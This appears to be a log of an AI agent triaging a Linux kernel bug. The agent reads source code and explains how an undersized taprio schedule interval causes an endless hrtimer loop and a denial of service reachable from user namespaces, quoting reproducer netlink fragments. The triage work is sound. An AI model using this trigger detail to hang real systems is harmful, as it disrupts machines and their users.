193: return taprio_mono_to_any(q, ktime_get());
194: }
SourceFile:net/sched/sch_taprio.c]
|
| 64/2 |
2026/05/24 13:30 |
llm |
expert |
0m
Model:
Tokens:
input: 59314
output: 44
thoughts: 1393
Thoughts: **Analysis of a Potential High-Resolution Timer (HRTimer) Infinite Loop Vulnerability in TAPRIO Scheduler**
Okay, let's break this down. It seems we have a situation where the TAPRIO scheduler's HRTimer mechanism can potentially get stuck in an infinite loop, ultimately leading to an RCU stall. My initial thought is that `taprio_get_time` provides the current time. If `base_time` is zero, then the `start` time for the timer is calculated as the next multiple of a `cycle` after the current time (`now`). This implies `start` will be at most 257 ns in the future.
The `setup_first_end_time` function sets `first->end_time = start + 257`. The `taprio_start_sched` function then triggers the HRTimer to fire at `start`. When the HRTimer fires, `now` will be at least `start`. `advance_sched` is then called, which sets `end_time = start + 257` and re-schedules the HRTimer at `start + 257`.
Here's the problem. Interrupt latency or other delays can make `now` already be much further ahead than `start + 257`. This means the new scheduled time is already in the past! `__hrtimer_run_queues` will see the timer has expired and run it again. `advance_sched` adjusts `end_time` by only adding 257ns each time.
Let's assume `now` is already `start + 10000` (due to interrupt latency). It will run the `advance_sched` function numerous times: `10000 / 257` times, for example, until the `end_time` is larger than `now`. However, if the loop's execution time, specifically the `advance_sched` function, is longer than the time it is incrementing (257ns), it will *never* catch up.
I'm thinking, based on my understanding, `advance_sched` involves a spinlock, some calculations, calling `hrtimer_set_expires`, and scheduling via `__netif_schedule`. This isn't a quick operation. It easily takes more than 257 ns, more likely 300-500 ns. So, if `advance_sched` takes, say, 500 ns, but only advances `end_time` by 257 ns, it will loop forever!
This screams "infinite loop" to me. It's a classic scenario where the timer's interval is smaller than the time it takes to process the timer callback. The HRTimer will never catch up, and the CPU will be stuck in a softirq indefinitely, causing a Denial of Service (DoS) by causing RCU stalls.
Is this exploitable? It's definitely an infinite loop, and it occurs in softirq context, so, it's a DoS. No memory corruption or privilege escalation is involved, just a hang.
Crucially, can we exploit it from an unprivileged process? The reproducer uses `socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE)` and sends an `RTM_NEWQDISC` message. This requires `CAP_NET_ADMIN` in the network namespace, which I understand is accessible from user namespaces. So, we're looking at a user namespace DoS vulnerability. Not remote, requires netlink and local network namespace config. No, not exploitable from a VM guest.
Now, let's explore if we can create a situation where the timer interval is *guaranteed* to be too small. If the link `speed` is set to a high value like 100 Gbps, then `min_duration` will be very small. For example, with `speed` set to 100000 (100 Gbps), `picos_per_byte = 80`. `min_duration = 60 * 80 / 1000 = 4 ns`.
If the `interval` is forced to 4 ns, it will loop forever. But how can we *force* a small interval?
The code checks if the `cycle_time` is small enough:
```
if (new->cycle_time < new->num_entries * length_to_duration(q, ETH_ZLEN)) {
NL_SET_ERR_MSG(extack, "'cycle_time' is too small");
return -EINVAL;
}
```
This forces the cycle time to be larger than `num_entries * min_
|
| 65/2 |
2026/05/24 13:30 |
tool |
codesearch-definition-source |
0m
Error:
Args: map[ContextFile:drivers/net/dummy.c IncludeLines:true Name:dummy_get_link_ksettings]
Results: map[SourceCode: SourceFile:]
|
| 66/2 |
2026/05/24 13:30 |
llm |
expert |
0m
Model:
Tokens:
input: 61797
output: 39
thoughts: 9
Thoughts: Okay, here's my attempt at summarizing the thought process, tailored for an expert audience, and written in the first person:
**Let's Verify That `dummy_setup` is Doing What It's Supposed To**
Alright, before diving too deep, I need to make absolutely sure the foundational element, `dummy_setup`, is behaving as expected. This is crucial; if the base isn't solid, any analysis built upon it will be flawed. I'm thinking I'll quickly verify its core functionality – are the basic parameters being initialized correctly? Are the expected data structures being populated as designed? There's no point in building a complex test bench on a shaky foundation. I need to take a few moments and thoroughly validate that the `dummy_setup` module is, in fact, "dummy-ing" things up correctly, before moving on.
|
| 67/2 |
2026/05/24 13:30 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:drivers/net/dummy.c IncludeLines:true Name:dummy_setup]
Results: map[SourceCode: 100: static void dummy_setup(struct net_device *dev)
101: {
102: ether_setup(dev);
103:
104: /* Initialize the device structure. */
105: dev->netdev_ops = &dummy_netdev_ops;
106: dev->ethtool_ops = &dummy_ethtool_ops;
107: dev->needs_free_netdev = true;
108: dev->request_ops_lock = true;
109:
110: /* Fill in device structure with ethernet-generic values. */
111: dev->flags |= IFF_NOARP;
112: dev->flags &= ~IFF_MULTICAST;
113: dev->priv_flags |= IFF_LIVE_ADDR_CHANGE | IFF_NO_QUEUE;
114: dev->lltx = true;
115: dev->features |= NETIF_F_SG | NETIF_F_FRAGLIST;
116: dev->features |= NETIF_F_GSO_SOFTWARE;
117: dev->features |= NETIF_F_HW_CSUM | NETIF_F_HIGHDMA;
118: dev->features |= NETIF_F_GSO_ENCAP_ALL;
119: dev->hw_features |= dev->features;
120: dev->hw_enc_features |= dev->features;
121: eth_hw_addr_random(dev);
122:
123: dev->min_mtu = 0;
124: dev->max_mtu = 0;
125: }
SourceFile:drivers/net/dummy.c]
|
| 68/2 |
2026/05/24 13:30 |
llm |
expert |
0m
Model:
Tokens:
input: 62511
output: 43
thoughts: 13
Thoughts: Okay, let's dive into this. Here's my thought process summarized, assuming I'm already pretty familiar with these types of systems:
**Checking `dummy_ethtool_ops`**
Right, let's take a look at `dummy_ethtool_ops`. My initial thought is to refresh my memory on what exactly this structure represents. I'm assuming it's part of some kind of network driver or interface. I need to quickly recall what context this comes from. Is it a real network card or something virtual? Is this used to emulate an interface during testing, for debugging or for some other purpose? Based on the name it is probably a dummy of ethool interface. It's used as a mock? I need to understand what this structure holds, the functions it exposes, and how they interact with other parts of the system. I have to see how it fits into the broader picture of the network stack. I'll need to scrutinize the code using it. My goal is to quickly pinpoint its role, any potential complexities, and how it handles certain ethool operations.
|
| 69/2 |
2026/05/24 13:30 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:drivers/net/dummy.c IncludeLines:true Name:dummy_ethtool_ops]
Results: map[SourceCode: 96: static const struct ethtool_ops dummy_ethtool_ops = {
97: .get_ts_info = ethtool_op_get_ts_info,
98: };
SourceFile:drivers/net/dummy.c]
|
| 70/2 |
2026/05/24 13:30 |
llm |
expert |
0m
Model:
Tokens:
input: 62884
output: 61
thoughts: 456
Thoughts: **Analyzing the Taprio Scheduler's Duration Calculation**
Okay, so I'm digging into this code, specifically the Taprio scheduler, and it seems like there's a potential issue. The initial trace suggests a scenario where `get_link_ksettings` isn't available, which will lead to an error from `__ethtool_get_link_ksettings`. This results in the `speed` variable being set to `SPEED_10`, or 10, which I know sets `min_duration` to 48000. If `min_duration` is, in fact, 48000, that requires an `interval` of at least 48000 (48 us). The implication here is that with an `interval` of 48 us, `advance_sched` takes 0.5 us, so it will NOT loop forever.
But, the reproducer uses `team0`, which is where things get interesting. `team_ethtool_get_link_ksettings` returns 0, but crucially sets `cmd->base.speed = SPEED_UNKNOWN`. This means `speed` still remains at `SPEED_10`, and therefore `min_duration` is still 48000. That is consistent. However, the reproducer explicitly sets `interval = 257`.
Here's the problem: how can `interval = 257` possibly pass the check `interval < min_duration` when `min_duration` is 48000? Something is clearly not right. I need to re-examine the `length_to_duration` function.
```c
static int length_to_duration(struct taprio_sched *q, int len)
{
return div_u64(len * atomic64_read(&q->picos_per_byte), PSEC_PER_NSEC);
}
```
Okay, wait a second... this is where it's at! The value of `atomic64_read(&q->picos_per_byte)` is 800000. And `len` is `ETH_ZLEN` (60), which I know is the minimum ethernet frame size. So, `60 * 800000 = 48,000,000`. Dividing by 1000 (I know PSEC_PER_NSEC is 1000) results in 48000. It all checks out here, now the question is is `ETH_ZLEN` truly 60, as I expect it to be. I need to check the definition of `ETH_ZLEN` in `net/sched/sch_taprio.c` to be sure.
|
| 71/2 |
2026/05/24 13:30 |
tool |
codesearch-find-references |
0m
Error:
Args: map[ContextFile:net/sched/sch_taprio.c IncludeSnippetLines:2 Name:ETH_ZLEN SourceTreePrefix:net/sched/sch_taprio.c]
Results: map[References:<nil> TruncatedOutput:false]
|
| 72/2 |
2026/05/24 13:30 |
llm |
expert |
0m
Model:
Tokens:
input: 64028
output: 44
thoughts: 35
Thoughts: Here's my thought process, as if I were reviewing this code:
**Checking the Ethernet Zero-Length Padding**
Hmm, hang on a minute. I thought I remembered seeing something about `ETH_ZLEN` being relevant to the scheduling code, especially in that `sch_taprio.c` file. But a quick scan...it doesn't seem to be used directly in that file, at least not in any obvious way. That's a little surprising, I would have expected to see it pop up when dealing with Ethernet frames in the scheduler. Okay, let's back up a bit and double-check where that might come into play... I need to re-examine the `fill_sched_entry` function again, to make sure I haven't missed something related to padding or frame sizes. Something might trigger a different padding requirement that I didn't see initially. I'll need to go through it with a fine-toothed comb.
|
| 73/2 |
2026/05/24 13:31 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeLines:true Name:fill_sched_entry]
Results: map[SourceCode:1035: static int fill_sched_entry(struct taprio_sched *q, struct nlattr **tb,
1036: struct sched_entry *entry,
1037: struct netlink_ext_ack *extack)
1038: {
1039: int min_duration = length_to_duration(q, ETH_ZLEN);
1040: u32 interval = 0;
1041:
1042: if (tb[TCA_TAPRIO_SCHED_ENTRY_CMD])
1043: entry->command = nla_get_u8(
1044: tb[TCA_TAPRIO_SCHED_ENTRY_CMD]);
1045:
1046: if (tb[TCA_TAPRIO_SCHED_ENTRY_GATE_MASK])
1047: entry->gate_mask = nla_get_u32(
1048: tb[TCA_TAPRIO_SCHED_ENTRY_GATE_MASK]);
1049:
1050: if (tb[TCA_TAPRIO_SCHED_ENTRY_INTERVAL])
1051: interval = nla_get_u32(
1052: tb[TCA_TAPRIO_SCHED_ENTRY_INTERVAL]);
1053:
1054: /* The interval should allow at least the minimum ethernet
1055: * frame to go out.
1056: */
1057: if (interval < min_duration) {
1058: NL_SET_ERR_MSG(extack, "Invalid interval for schedule entry");
1059: return -EINVAL;
1060: }
1061:
1062: entry->interval = interval;
1063:
1064: return 0;
1065: }
SourceFile:net/sched/sch_taprio.c]
|
| 74/2 |
2026/05/24 13:31 |
llm |
expert |
0m
Model:
Tokens:
input: 64827
output: 40
thoughts: 1058
Thoughts: **Debugging a TAPRIO Scheduler Vulnerability**
Okay, here's the breakdown of my thought process as I'm looking at this TAPRIO scheduler issue. It *is* being used, so that's confirmed. Now, I'm trying to figure out why a seemingly straightforward check is failing. My initial instinct was to use `codesearch-find-references`, but it failed, so I'm thinking maybe it's a macro. Let's dig deeper.
I see that `min_duration` is set to 48000. And if `interval` is indeed 257 (as the code suggests), the condition `interval < min_duration` should evaluate to TRUE, triggering an `-EINVAL` return. But it's not. That's the core of the problem. Why isn't it returning `-EINVAL`?
My next thought is to look at `q->picos_per_byte`. Maybe it's zero somehow? And when is `taprio_set_picos_per_byte` called? The code shows that it's being called, during netlink attribute parsing using `taprio_set_picos_per_byte(dev, q, extack)`. But wait...what if `dev` is something unexpected? Let's check the reproducer.
Aha! The reproducer does a `memcpy` to write "team0" and then calls `ioctl` on it. So `dev` is actually `team0`. Okay, so `team0` is our device. Could `team0` have a speed of zero? It's possible! And from looking at the `team_ethtool_get_link_ksettings` function, I know that if `speed` is zero, it returns `SPEED_UNKNOWN`. And then it remains at `SPEED_10`.
Now let's verify my assumptions. Let's make sure that `SPEED_10` is indeed 10, which it is. And let's be sure that `USEC_PER_SEC` is still 1000000, which it is. So, let's look at how `picos_per_byte` is calculated. It's `(USEC_PER_SEC * 8) / speed`. Okay! `1000000 * 8 / 10 = 800000`. So, `picos_per_byte` is 800000.
Then, `length_to_duration` is `60 * 800000 / 1000 = 48000`. So yes, all the math holds. Now, why does `interval = 257` pass? Could `interval` be `0x4000000`? Because if `interval` is `0x4000000`, that is 67,108,864. Then if `interval` is indeed `67,108,864`, then `interval < min_duration` would be FALSE! Yes, that would be why it passes.
But wait, I said earlier that `nla_parse_nested_deprecated` keeps the LAST attribute, and the reproducer sets the interval twice. And in the reproducer, `interval` is set to `0x101` (257) in the last attribute. Then it should FAIL the check! Let's check the `nla_parse_nested_deprecated` implementation. This is where I need to focus my attention. It looks like my assumption about the *last* attribute being kept might be wrong, or the order of attribute processing is the key.
|
| 75/2 |
2026/05/24 13:31 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:lib/nlattr.c IncludeLines:true Name:__nla_parse]
Results: map[SourceCode: 711: /**
712: * __nla_parse - Parse a stream of attributes into a tb buffer
713: * @tb: destination array with maxtype+1 elements
714: * @maxtype: maximum attribute type to be expected
715: * @head: head of attribute stream
716: * @len: length of attribute stream
717: * @policy: validation policy
718: * @validate: validation strictness
719: * @extack: extended ACK pointer
720: *
721: * Parses a stream of attributes and stores a pointer to each attribute in
722: * the tb array accessible via the attribute type.
723: * Validation is controlled by the @validate parameter.
724: *
725: * Returns 0 on success or a negative error code.
726: */
727: int __nla_parse(struct nlattr **tb, int maxtype,
728: const struct nlattr *head, int len,
729: const struct nla_policy *policy, unsigned int validate,
730: struct netlink_ext_ack *extack)
731: {
732: return __nla_validate_parse(head, len, maxtype, policy, validate,
733: extack, tb, 0);
734: }
SourceFile:lib/nlattr.c]
|
| 76/2 |
2026/05/24 13:31 |
llm |
expert |
0m
Model:
Tokens:
input: 67143
output: 42
thoughts: 13
Thoughts: Okay, let's dive into this. Here's my thought process summarized, assuming I'm already pretty familiar with the subject matter:
**Checking `__nla_validate_parse`**
Alright, time to get to it. My initial thought is to take a look at `__nla_validate_parse`. This function is usually where the magic happens; where we're going to see how the code handles the parsing and validation of Netlink attributes. I need to refresh my memory on exactly how it's implemented. I'm probably going to be thinking about data structures like `nla_policy` and the different validation rules they support, like enforcing length constraints, type checks, and potentially even more complex constraints. I need to understand how the code handles error conditions, too. What happens if the input data is malformed or violates the defined policies? Are we gracefully failing, logging errors, or potentially even leading to a security issue? That's what I want to see. I expect it's a critical component in safeguarding against malicious input. So, let's see what `__nla_validate_parse` has to offer.
|
| 77/2 |
2026/05/24 13:31 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:lib/nlattr.c IncludeLines:true Name:__nla_validate_parse]
Results: map[SourceCode: 604: static int __nla_validate_parse(const struct nlattr *head, int len, int maxtype,
605: const struct nla_policy *policy,
606: unsigned int validate,
607: struct netlink_ext_ack *extack,
608: struct nlattr **tb, unsigned int depth)
609: {
610: const struct nlattr *nla;
611: int rem;
612:
613: if (depth >= MAX_POLICY_RECURSION_DEPTH) {
614: NL_SET_ERR_MSG(extack,
615: "allowed policy recursion depth exceeded");
616: return -EINVAL;
617: }
618:
619: if (tb)
620: memset(tb, 0, sizeof(struct nlattr *) * (maxtype + 1));
621:
622: nla_for_each_attr(nla, head, len, rem) {
623: u16 type = nla_type(nla);
624:
625: if (type == 0 || type > maxtype) {
626: if (validate & NL_VALIDATE_MAXTYPE) {
627: NL_SET_ERR_MSG_ATTR(extack, nla,
628: "Unknown attribute type");
629: return -EINVAL;
630: }
631: continue;
632: }
633: type = array_index_nospec(type, maxtype + 1);
634: if (policy) {
635: int err = validate_nla(nla, maxtype, policy,
636: validate, extack, depth);
637:
638: if (err < 0)
639: return err;
640: }
641:
642: if (tb)
643: tb[type] = (struct nlattr *)nla;
644: }
645:
646: if (unlikely(rem > 0)) {
647: pr_warn_ratelimited("netlink: %d bytes leftover after parsing attributes in process `%s'.\n",
648: rem, current->comm);
649: NL_SET_ERR_MSG(extack, "bytes leftover after parsing attributes");
650: if (validate & NL_VALIDATE_TRAILING)
651: return -EINVAL;
652: }
653:
654: return 0;
655: }
SourceFile:lib/nlattr.c]
|
| 78/2 |
2026/05/24 13:31 |
llm |
expert |
0m
Model:
Tokens:
input: 68222
output: 53
thoughts: 492
Thoughts: **Debugging a TAPRIO Scheduler Entry Interval Issue**
Okay, so I'm stepping through this code, and it's clear that `tb[type] = (struct nlattr *)nla;` is indeed overwriting the previous entry in the `tb` array. This means that `tb[TCA_TAPRIO_SCHED_ENTRY_INTERVAL]` is always going to hold the *last* one. Right, that makes sense.
Now, I see that the last one is `0x101` (257), so my `interval` variable should be set to 257. If `min_duration` is 48000, then the check `interval < min_duration` should be TRUE, and therefore, I expect the function to return `-EINVAL`. But it's *not* returning `-EINVAL`. Why not? This is a head-scratcher.
Hold on, let me re-examine the reproducer again. Hmm...
```
// union entry_policy$taprio {
// TCA_TAPRIO_SCHED_ENTRY_INTERVAL: nlattr_t[const[TCA_TAPRIO_SCHED_ENTRY_INTERVAL, int16], int32] {
// nla_len: offsetof = 0x8 (2 bytes)
// nla_type: const = 0x4 (2 bytes)
// payload: int32 = 0x4000000 (4 bytes)
// size: buffer: {} (length 0x0)
// }
// }
// union entry_policy$taprio {
// TCA_TAPRIO_SCHED_ENTRY_INTERVAL: nlattr_t[const[TCA_TAPRIO_SCHED_ENTRY_INTERVAL, int16], int32] {
// nla_len: offsetof = 0x8 (2 bytes)
// nla_type: const = 0x4 (2 bytes)
// payload: int32 = 0x101 (4 bytes)
// size: buffer: {} (length 0x0)
// }
// }
```
Wait a second... the reproducer *explicitly* sets `nla_type` to `0x4` in *both* entries! And, as I remember, `TCA_TAPRIO_SCHED_ENTRY_INTERVAL` has a specific value to begin with... I need to check the definition of `TCA_TAPRIO_SCHED_ENTRY_INTERVAL`. What is it? Could it be that the value `0x101` is *not* actually `TCA_TAPRIO_SCHED_ENTRY_INTERVAL`? Let me go look it up... This might be the key.
|
| 79/2 |
2026/05/24 13:31 |
tool |
codesearch-definition-source |
0m
Error:
Args: map[ContextFile:include/uapi/linux/pkt_sched.h IncludeLines:true Name:TCA_TAPRIO_SCHED_ENTRY_INTERVAL]
Results: map[SourceCode: SourceFile:]
|
| 80/2 |
2026/05/24 13:31 |
llm |
expert |
0m
Model:
Tokens:
input: 69423
output: 26
thoughts: 19
Thoughts: Here's my thought process, as it just played out:
**Diving into the Codebase: The Search for `TCA_TAPRIO_SCHED_ENTRY_INTERVAL`**
Okay, so I'm looking for this specific constant, `TCA_TAPRIO_SCHED_ENTRY_INTERVAL`. That name is pretty specific, so it should be relatively easy to track down. Given the context, my first instinct is to use `grep`. This suggests it's likely a constant defined somewhere in the TAPRIO scheduling code, or at least used there. So, I need to figure out the likely directories to search. I'll probably start with a broad search to see what I turn up, then refine the search if I need to. I'm expecting this to be defined as an integer, some kind of interval time, likely in nanoseconds or microseconds based on my experience with networking code. Now, let's see what `grep` reveals... let's get started.
|
| 81/2 |
2026/05/24 13:31 |
tool |
grepper |
0m
Args: map[Expression:TCA_TAPRIO_SCHED_ENTRY_INTERVAL]
Results: map[Output:include/uapi/linux/pkt_sched.h=1118=enum {
--
include/uapi/linux/pkt_sched.h-1122- TCA_TAPRIO_SCHED_ENTRY_GATE_MASK, /* u32 */
include/uapi/linux/pkt_sched.h:1123: TCA_TAPRIO_SCHED_ENTRY_INTERVAL, /* u32 */
include/uapi/linux/pkt_sched.h-1124- __TCA_TAPRIO_SCHED_ENTRY_MAX,
--
include/uapi/linux/pkt_sched.h-1132- * [TCA_TAPRIO_SCHED_ENTRY_GATES]
include/uapi/linux/pkt_sched.h:1133: * [TCA_TAPRIO_SCHED_ENTRY_INTERVAL]
include/uapi/linux/pkt_sched.h-1134- */
--
net/sched/sch_taprio.c=997=static const struct nla_policy entry_policy[TCA_TAPRIO_SCHED_ENTRY_MAX + 1] = {
--
net/sched/sch_taprio.c-1000- [TCA_TAPRIO_SCHED_ENTRY_GATE_MASK] = { .type = NLA_U32 },
net/sched/sch_taprio.c:1001: [TCA_TAPRIO_SCHED_ENTRY_INTERVAL] = { .type = NLA_U32 },
net/sched/sch_taprio.c-1002-};
--
net/sched/sch_taprio.c=1035=static int fill_sched_entry(struct taprio_sched *q, struct nlattr **tb,
--
net/sched/sch_taprio.c-1049-
net/sched/sch_taprio.c:1050: if (tb[TCA_TAPRIO_SCHED_ENTRY_INTERVAL])
net/sched/sch_taprio.c-1051- interval = nla_get_u32(
net/sched/sch_taprio.c:1052: tb[TCA_TAPRIO_SCHED_ENTRY_INTERVAL]);
net/sched/sch_taprio.c-1053-
--
net/sched/sch_taprio.c=2216=static int dump_entry(struct sk_buff *msg,
--
net/sched/sch_taprio.c-2234-
net/sched/sch_taprio.c:2235: if (nla_put_u32(msg, TCA_TAPRIO_SCHED_ENTRY_INTERVAL,
net/sched/sch_taprio.c-2236- entry->interval))
--
tools/include/uapi/linux/pkt_sched.h=1017=enum {
--
tools/include/uapi/linux/pkt_sched.h-1021- TCA_TAPRIO_SCHED_ENTRY_GATE_MASK, /* u32 */
tools/include/uapi/linux/pkt_sched.h:1022: TCA_TAPRIO_SCHED_ENTRY_INTERVAL, /* u32 */
tools/include/uapi/linux/pkt_sched.h-1023- __TCA_TAPRIO_SCHED_ENTRY_MAX,
--
tools/include/uapi/linux/pkt_sched.h-1031- * [TCA_TAPRIO_SCHED_ENTRY_GATES]
tools/include/uapi/linux/pkt_sched.h:1032: * [TCA_TAPRIO_SCHED_ENTRY_INTERVAL]
tools/include/uapi/linux/pkt_sched.h-1033- */
]
|
| 82/2 |
2026/05/24 13:31 |
llm |
expert |
0m
Model:
Tokens:
input: 70608
output: 41
thoughts: 2620
Thoughts: **Analysis of a TAPRIO Scheduler Infinite Loop Vulnerability**
Okay, let's break this down. My initial thought was: `TCA_TAPRIO_SCHED_ENTRY_INTERVAL` is 4, then 1, and the command is 2, the gate mask is 3, and the interval is 4 again, which is definitely 4. So `tb[4]` gives me the interval. Now, if the `interval` is set to 257 and `min_duration` is 48000, it *should* fail, right? But it doesn't! Why?
I need to look at the `length_to_duration` function, maybe that is the culprit, if it returns 0 for a small length.
```c
static int length_to_duration(struct taprio_sched *q, int len)
{
return div_u64(len * atomic64_read(&q->picos_per_byte), PSEC_PER_NSEC);
}
```
Okay, `picos_per_byte` is key. It's read atomically, and it comes from `taprio_change`. Now, what if `q->picos_per_byte` is zero? Does `taprio_set_picos_per_byte` set it to zero?
```c
picos_per_byte = (USEC_PER_SEC * 8) / speed;
if (picos_per_byte < TAPRIO_PICOS_PER_BYTE_MIN) {
...
picos_per_byte = TAPRIO_PICOS_PER_BYTE_MIN;
}
```
If the link `speed` is enormous, `picos_per_byte` could be *very* small, potentially zero but it's clamped to `TAPRIO_PICOS_PER_BYTE_MIN` (17). So it's at least 17, and `min_duration` must be at least 1. 257 is greater than 1, if `min_duration` is 1, `interval = 257` would *pass* the check! But why is `min_duration` ever 1? It would be if speed is gigantic.
What's the speed of `team0`? I checked `team_ethtool_get_link_ksettings`, it returns `SPEED_UNKNOWN` if there are no ports. Then the `speed` remains `SPEED_10` (10). Then `picos_per_byte` would be 800000. And then `min_duration` is 48000. If `min_duration` is 48000, `interval = 257` should FAIL! Why isn't it failing?
I need to dig into `team0` further. Syzkaller's `setup_net` code! It creates a `veth` pair and adds one end to `team0`. Let's see that... Syzkaller creates `team0` and adds `veth0` to it. And `veth0` has a speed of 10000.
Now: if the speed is 10000, `picos_per_byte = 1000000 * 8 / 10000 = 800`. Then `min_duration = 60 * 800 / 1000 = 48`. Now, if `min_duration` is 48, then `interval = 257` is GREATER than `min_duration`! So it PASSES! Aha!
So `min_duration` is 48 and `interval` is 257. Therefore the `cycle_time` is 257. `advance_sched` advances the `end_time` by 257 ns each time. Since 257 ns is smaller than the time it takes to execute `advance_sched` (which is about 500 ns), it *loops forever*! That's the bug.
**The Bug**
An attacker can make a taprio schedule with a single entry (or many) so the total `cycle_time` is tiny (e.g., 257 ns). The only limit on `cycle_time` is that it's at least `num_entries * min_duration`. `min_duration` depends on the link speed. If the link speed is high (like 10000 Mbps for `veth` or 100000 Mbps for some
|
| 83/2 |
2026/05/24 13:32 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:kernel/time/hrtimer.c IncludeLines:true Name:hrtimer_interrupt]
Results: map[SourceCode:1869: /*
1870: * High resolution timer interrupt
1871: * Called with interrupts disabled
1872: */
1873: void hrtimer_interrupt(struct clock_event_device *dev)
1874: {
1875: struct hrtimer_cpu_base *cpu_base = this_cpu_ptr(&hrtimer_bases);
1876: ktime_t expires_next, now, entry_time, delta;
1877: unsigned long flags;
1878: int retries = 0;
1879:
1880: BUG_ON(!cpu_base->hres_active);
1881: cpu_base->nr_events++;
1882: dev->next_event = KTIME_MAX;
1883:
1884: raw_spin_lock_irqsave(&cpu_base->lock, flags);
1885: entry_time = now = hrtimer_update_base(cpu_base);
1886: retry:
1887: cpu_base->in_hrtirq = 1;
1888: /*
1889: * We set expires_next to KTIME_MAX here with cpu_base->lock
1890: * held to prevent that a timer is enqueued in our queue via
1891: * the migration code. This does not affect enqueueing of
1892: * timers which run their callback and need to be requeued on
1893: * this CPU.
1894: */
1895: cpu_base->expires_next = KTIME_MAX;
1896:
1897: if (!ktime_before(now, cpu_base->softirq_expires_next)) {
1898: cpu_base->softirq_expires_next = KTIME_MAX;
1899: cpu_base->softirq_activated = 1;
1900: raise_timer_softirq(HRTIMER_SOFTIRQ);
1901: }
1902:
1903: __hrtimer_run_queues(cpu_base, now, flags, HRTIMER_ACTIVE_HARD);
1904:
1905: /* Reevaluate the clock bases for the [soft] next expiry */
1906: expires_next = hrtimer_update_next_event(cpu_base);
1907: /*
1908: * Store the new expiry value so the migration code can verify
1909: * against it.
1910: */
1911: cpu_base->expires_next = expires_next;
1912: cpu_base->in_hrtirq = 0;
1913: raw_spin_unlock_irqrestore(&cpu_base->lock, flags);
1914:
1915: /* Reprogramming necessary ? */
1916: if (!tick_program_event(expires_next, 0)) {
1917: cpu_base->hang_detected = 0;
1918: return;
1919: }
1920:
1921: /*
1922: * The next timer was already expired due to:
1923: * - tracing
1924: * - long lasting callbacks
1925: * - being scheduled away when running in a VM
1926: *
1927: * We need to prevent that we loop forever in the hrtimer
1928: * interrupt routine. We give it 3 attempts to avoid
1929: * overreacting on some spurious event.
1930: *
1931: * Acquire base lock for updating the offsets and retrieving
1932: * the current time.
1933: */
1934: raw_spin_lock_irqsave(&cpu_base->lock, flags);
1935: now = hrtimer_update_base(cpu_base);
1936: cpu_base->nr_retries++;
1937: if (++retries < 3)
1938: goto retry;
1939: /*
1940: * Give the system a chance to do something else than looping
1941: * here. We stored the entry time, so we know exactly how long
1942: * we spent here. We schedule the next event this amount of
1943: * time away.
1944: */
1945: cpu_base->nr_hangs++;
1946: cpu_base->hang_detected = 1;
1947: raw_spin_unlock_irqrestore(&cpu_base->lock, flags);
1948:
1949: delta = ktime_sub(now, entry_time);
1950: if ((unsigned int)delta > cpu_base->max_hang_time)
1951: cpu_base->max_hang_time = (unsigned int) delta;
1952: /*
1953: * Limit it to a sensible value as we enforce a longer
1954: * delay. Give the CPU at least 100ms to catch up.
1955: */
1956: if (delta > 100 * NSEC_PER_MSEC)
1957: expires_next = ktime_add_ns(now, 100 * NSEC_PER_MSEC);
1958: else
1959: expires_next = ktime_add(now, delta);
1960: tick_program_event(expires_next, 1);
1961: pr_warn_once("hrtimer: interrupt took %llu ns\n", ktime_to_ns(delta));
1962: }
SourceFile:kernel/time/hrtimer.c]
|
| 84/2 |
2026/05/24 13:32 |
llm |
expert |
0m
Model:
Tokens:
input: 75837
output: 66
thoughts: 1213
Thoughts: **Analysis of a High-Resolution Timer (HRTimer) Vulnerability**
Okay, so I've been digging into this `hrtimer_interrupt` function, and something's not quite right. Initially, I saw that it has a loop limit of 3, designed to prevent it from getting stuck. It seemed to break and schedule the next event, `delta` away, if that loop hits its limit. But I realized that `__hrtimer_run_queues` is called *within* `hrtimer_interrupt`. And `__hrtimer_run_queues` *also* has a `while` loop!
The crucial point is that the `basenow` variable, which determines the loop's termination condition, *isn't updated inside the `while` loop*. It's passed by value to `__hrtimer_run_queues` as `now`, and then `basenow` is calculated as `ktime_add(now, base->offset)`. `basenow` then is passed by reference to `__run_hrtimer`, but `__run_hrtimer` *doesn't* update it! It just uses `now` to trace the event.
So, in the `while` loop within `__hrtimer_run_queues`, `basenow` *remains constant*. If `advance_sched` sets a timer to expire at `end_time`, and if `end_time` is less than or equal to `basenow`, the loop condition `basenow < hrtimer_get_softexpires_tv64(timer)` becomes false! That is, `basenow >= end_time`. This means the `while` loop *won't* break, and it keeps running `advance_sched` again, and again, and again! Because `basenow` is constant, and `end_time` increases by a measly 257 ns each time, it will loop until `end_time > basenow`!
Here's the problem: if `basenow` is ahead of `end_time` by just 1 second, it'll take roughly 3.9 million iterations to catch up. Each iteration takes about 500ns in `advance_sched`, so that's about 1.9 seconds spent *just in that loop*. This blocks the CPU completely during this process, potentially causing an RCU stall.
Here's where it gets even worse: Once the loop *does* break, and `hrtimer_interrupt` returns, 1.9 seconds have passed. The *actual* real time is now 1.9 seconds *ahead* of the base time, `basenow`. The timer hardware will fire *another* interrupt immediately because the next expiration time (`end_time`) is now in the *past*! Then `hrtimer_interrupt` is called again. `now` is updated to real time, and we start this process all over again.
Because the system never catches up, in the second iteration, we end up 3.6 seconds behind. The gap just keeps growing! It's a perfect infinite loop, leading to a CPU lockup and RCU stall.
Therefore, the root cause is a Denial of Service (DoS) due to an HRTimer advancing its expiration time by a very small amount (e.g., 257 ns), which is less than the overhead of processing the timer. It prevents the timer from ever catching up with real time, resulting in an infinite loop.
The vulnerability is accessible from user namespaces because it requires `CAP_NET_ADMIN` to configure the taprio qdisc, which is obtainable in a new user+network namespace.
So, after a final check of the questions. The vulnerability is exploitable: No, a Denial Of Service: Yes, accessible from Unprivileged Processes: No, accessible from user namespaces: Yes. It is not triggered by a VM Guest, VM Host or Ethernet network trigger. It is not triggered by a Peripheral, nor a Malicious Filesystem trigger.
I'm confident I understand the mechanics of this bug.
|
| 85/2 |
2026/05/24 13:32 |
tool |
set-results |
0m
Args: map[DenialOfService:true Exploitable:false FilesystemTrigger:false NetworkTrigger:false PeripheralTrigger:false RemoteTrigger:false Unprivileged:false UserNamespace:true VMGuestTrigger:false VMHostTrigger:false]
